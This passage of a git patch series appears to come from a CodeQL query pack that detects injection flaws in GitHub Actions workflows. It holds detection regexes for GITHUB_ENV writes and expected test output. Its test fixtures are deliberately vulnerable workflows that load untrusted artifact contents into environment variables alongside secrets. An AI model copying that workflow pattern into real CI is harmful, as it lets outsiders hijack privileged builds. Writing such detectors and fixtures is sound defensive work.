ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f689f38ef52..2b3896d0cf0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.6 +version: 0.0.7 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f2ce850e5b8..ac6083b7d6d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.6 +version: 0.0.7 groups: - actions - queries From 31a1ea9593a7efaae02ecde49c1fa62b0b8e5f22 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:00 +0200 Subject: [PATCH 0153/1267] Improve envvar injection --- ql/lib/codeql/actions/Ast.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 21 ++++++ .../actions/security/EnvVarInjectionQuery.qll | 37 ++++++--- ql/src/Security/CWE-077/EnvVarInjection.ql | 2 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 2 +- ql/test/library-tests/test.expected | 6 ++ .../.github/workflows/sonar-source.yml | 75 +++++++++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 11 +++ .../PrivilegedEnvVarInjection.expected | 17 ++++- .../.github/workflows/sonar-source.yml | 71 ++++++++++++++++++ 10 files changed, 229 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a9fe35259c5..e0da57adb6f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,7 +34,7 @@ module Utils { .regexpReplaceAll("^'", "") .regexpReplaceAll("'$", "") or assignment = - line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + var.toUpperCase() + "(\"|')?", 2) ) and key = assignment.splitAt("=", 0).trim() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 242cbcf9a31..e66c8e7c1b9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -64,3 +64,24 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } + +/** + * A downloaded artifact that gets assigned to an env var declaration. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-env name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and - expr = exprNode.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) +class EnvVarInjectionFromExprSink extends DataFlow::Node { + EnvVarInjectionFromExprSink() { + exists(Expression expr, Run run, string script, string line, string key, string value | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) and + expr = this.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) + } +} + +class EnvVarInjectionFromFileSink extends DataFlow::Node { + EnvVarInjectionFromFileSink() { + exists(Run run, ArtifactDownloadStep step, string value | + this.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this, _, _) or + this instanceof EnvVarInjectionFromExprSink or + this instanceof EnvVarInjectionFromFileSink or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index e758932b208..2fca3b32494 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -29,4 +29,4 @@ where ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 811a6f65c7c..1a32183bfb2 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -25,4 +25,4 @@ where ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6fe9408a7a3..639fbd4c530 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | @@ -426,6 +428,8 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv +| "sha1 | $( { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - uses: actions/github-script@v6 + with: + script: | + print("${{enb.SONAR_PR_NUM}}") + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index d5dbcbde086..0c4574a77cb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -1,5 +1,16 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 2692d03eefe..6dbe7bf3c93 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -1,6 +1,21 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml new file mode 100644 index 00000000000..7dc735dd6bc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml @@ -0,0 +1,71 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost From ae5b8bc0acfd64438232cdbe4bfc4b524d2849c7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:45 +0200 Subject: [PATCH 0154/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf0..f775d751164 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.7 +version: 0.0.8 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ac6083b7d6d..2db4c237da3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.7 +version: 0.0.8 groups: - actions - queries From 58b21d46849af2035327b1257554114e5eaeb972 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:52:13 +0200 Subject: [PATCH 0155/1267] Improve assignments to GITHUB ENVARS detection --- ql/lib/codeql/actions/Ast.qll | 45 +++++++------------ ql/test/library-tests/test.expected | 7 ++- ql/test/library-tests/test.ql | 3 ++ .../CWE-094/.github/workflows/test.yml | 16 ++++++- .../Security/CWE-094/CodeInjection.expected | 26 ++++++++--- .../CWE-094/PrivilegedCodeInjection.expected | 28 ++++++++---- 6 files changed, 74 insertions(+), 51 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e0da57adb6f..bbf5c86fb95 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -19,40 +19,25 @@ module Utils { ] } + bindingset[str] + string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") + } + bindingset[line, var] predicate extractAssignment(string line, string var, string key, string value) { exists(string assignment | - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^'", "") - .regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - ) and - key = assignment.splitAt("=", 0).trim() and - value = assignment.splitAt("=", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) or - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + - "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", - 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", - 2) - ) and - key = assignment.splitAt("::", 0).trim() and - value = assignment.splitAt("::", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value = trimQuotes(assignment.splitAt("::", 1)) ) } diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 639fbd4c530..aa2ccdcfe9c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -428,8 +428,6 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv -| "sha1 | $(> $GITHUB_OUTPUT", "echo 'sha2=$(> $GITHUB_OUTPUT", "echo sha3=$(> $GITHUB_OUTPUT", + "echo sha4=$(> \"$GITHUB_OUTPUT\"", + "echo sha5=$(> ${GITHUB_OUTPUT}", + "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and Utils::extractAssignment(t, "OUTPUT", key, value) ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index b9fa152e49a..153ebc5b733 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -5,7 +5,7 @@ jobs: runs-on: ubuntu-latest outputs: - job_output: ${{ steps.step2.outputs.test }} + job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 @@ -24,7 +24,19 @@ jobs: - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} - run: echo "test=$MSG" >> "$GITHUB_OUTPUT" + run: echo "MSG2=$MSG" >> "$GITHUB_OUTPUT" + - id: step3 + env: + MSG2: ${{steps.step2.outputs.MSG2}} + run: echo "MSG3=$MSG2" >> "${GITHUB_OUTPUT}" + - id: step4 + env: + MSG3: ${{steps.step3.outputs.MSG3}} + run: echo "MSG4=$MSG3" >> ${GITHUB_OUTPUT} + - id: step5 + env: + MSG4: ${{steps.step4.outputs.MSG4}} + run: echo "MSG5=$MSG4" >> $GITHUB_OUTPUT job2: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index d2e188ead67..1a12b8e7277 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | @@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bc1fd870950..f4df15ae344 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | 